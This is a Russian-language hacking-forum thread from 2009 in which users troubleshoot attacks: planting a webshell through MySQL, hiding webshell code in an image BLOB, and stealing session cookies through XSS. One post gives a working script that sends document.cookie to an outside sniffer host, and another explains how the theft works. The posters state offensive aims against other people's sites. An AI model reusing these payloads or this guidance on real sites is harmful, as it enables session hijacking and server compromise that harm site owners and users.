HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.02.2009, 21:02
tmp
Участник форума
Регистрация: 10.03.2005
Сообщений: 234
С нами: 11141693

Репутация: 56
По умолчанию

Я тоже так думал... пока не столкнулся с тем что создавая файлы на сервере через вебшел залитый через мускул не вижу на веб сервере))) Вот и возник вопрос - а не лохонулся ли я)))

Последний раз редактировалось tmp; 11.02.2009 в 21:04..
 
Ответить с цитированием

  #2  
Старый 11.02.2009, 21:48
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

2 geezer.code хорошо пусть я буду не прав, тогда обьясните мне как мускул прочитает файл с сервера Б на котором находится если файл физически находится на сервере А?
 
Ответить с цитированием

  #3  
Старый 11.02.2009, 21:50
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами: 10158086

Репутация: 1359


По умолчанию

Цитата:
Сообщение от Gorev  
2 geezer.code хорошо пусть я буду не прав, тогда обьясните мне как мускул прочитает файл с сервера Б на котором находится если файл физически находится на сервере А?
никак. а какой именно файл?(может он есть и на сервере Б тоже?).
мускул может работать в контексте конкретной ОС, и читать файлы вы можете только в контексте той ОС где висит мускул.
 
Ответить с цитированием

  #4  
Старый 11.02.2009, 22:58
tmp
Участник форума
Регистрация: 10.03.2005
Сообщений: 234
С нами: 11141693

Репутация: 56
По умолчанию

Цитата:
Сообщение от geezer.code  
может он есть и на сервере Б тоже?).
.
Так и есть.
 
Ответить с цитированием

  #5  
Старый 11.02.2009, 23:03
tmp
Участник форума
Регистрация: 10.03.2005
Сообщений: 234
С нами: 11141693

Репутация: 56
По умолчанию

В таком случае еще такой вопрос, может кто то уже пробовал такой прикол:
На веб сервере картинки берутся из мускула.
Если вставить в мускул вместо картинки код вебшела - то на вебсервере выполнится пхп код? Правда картинка вставляется в BLOB , не заругается ли мускул если туда пхп код вставить?
 
Ответить с цитированием

  #6  
Старый 12.02.2009, 19:13
tmp
Участник форума
Регистрация: 10.03.2005
Сообщений: 234
С нами: 11141693

Репутация: 56
По умолчанию

Цитата:
Сообщение от tmp  
В таком случае еще такой вопрос, может кто то уже пробовал такой прикол:
На веб сервере картинки берутся из мускула.
Если вставить в мускул вместо картинки код вебшела - то на вебсервере выполнится пхп код? Правда картинка вставляется в BLOB , не заругается ли мускул если туда пхп код вставить?
ПРобовал на локалхосте. код вставить можно, но на сервере он не выполняется
Че то я туплю

Последний раз редактировалось tmp; 12.02.2009 в 19:17..
 
Ответить с цитированием

  #7  
Старый 11.02.2009, 23:52
mozarat
Новичок
Регистрация: 10.02.2009
Сообщений: 7
С нами: 9077586

Репутация: 3
По умолчанию

У меня такая проблема...
Вобщем есть xss, все делаю правильно... Но мне приходят куки того хостинга на котором лежит мой сниффер. Если на народе страница с редиректом на сниффер, то приходят куки народа... Xss пасивная. Кто знает что может быть?
А если свой сниффер размещю на своем хостинге, то куки приходят тоже моего хостинга =\
 
Ответить с цитированием

  #8  
Старый 12.02.2009, 19:24
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Цитата:
Сообщение от mozarat  
У меня такая проблема...
Вобщем есть xss, все делаю правильно... Но мне приходят куки того хостинга на котором лежит мой сниффер. Если на народе страница с редиректом на сниффер, то приходят куки народа... Xss пасивная. Кто знает что может быть?
А если свой сниффер размещю на своем хостинге, то куки приходят тоже моего хостинга =\
Цитата:
Если на народе страница с редиректом на сниффер, то приходят куки народа
Вот. И не страница с редиректом, а страница, куда встроен javascript, который производит редирект на снифер + document.cookie

А где размещен снифер (а не ядовитая ссылка на него в виде кода javascript) значения не имеет
 
Ответить с цитированием

  #9  
Старый 12.02.2009, 21:14
mozarat
Новичок
Регистрация: 10.02.2009
Сообщений: 7
С нами: 9077586

Репутация: 3
По умолчанию

Цитата:
Сообщение от mozarat  
У меня такая проблема...
Вобщем есть xss, все делаю правильно... Но мне приходят куки того хостинга на котором лежит мой сниффер. Если на народе страница с редиректом на сниффер, то приходят куки народа... Xss пасивная. Кто знает что может быть?
А если свой сниффер размещю на своем хостинге, то куки приходят тоже моего хостинга =\
Код присутствующий на странице такой:
PHP код:
<script>img = new Image(); img.src "http://na-s.ru/images/mozarat_1.gif?"+document.cookie;</script
Это в .html

Или еще в .js
PHP код:
img = new Image(); img.src "http://na-s.ru/images/mozarat_1.gif?"+document.cookie
Xss активная прописывается в сообщении. Сайт выполняет код с заданой ссылки(сайта).
Ставил снииффер на lcoalhoste и сайт (двиг самописаный), и куки приходят нормальные.
 
Ответить с цитированием

  #10  
Старый 12.02.2009, 01:47
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами: 10254549

Репутация: 227
По умолчанию

Сайт построен на АЯКС. Нашёл КСС-ку. Но когда пытаюсь отправить данные на сервер методом ПОСТ, то вылетает ошибка:
Цитата:
Ошибка синтаксического анализа XML: ошибка синтаксиса
Адрес: http://hacsite.ru/12.php
Строка 1, символ 1k
^
что это может быть?


mozarat, покажи свой запрос, что ты составляешь
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.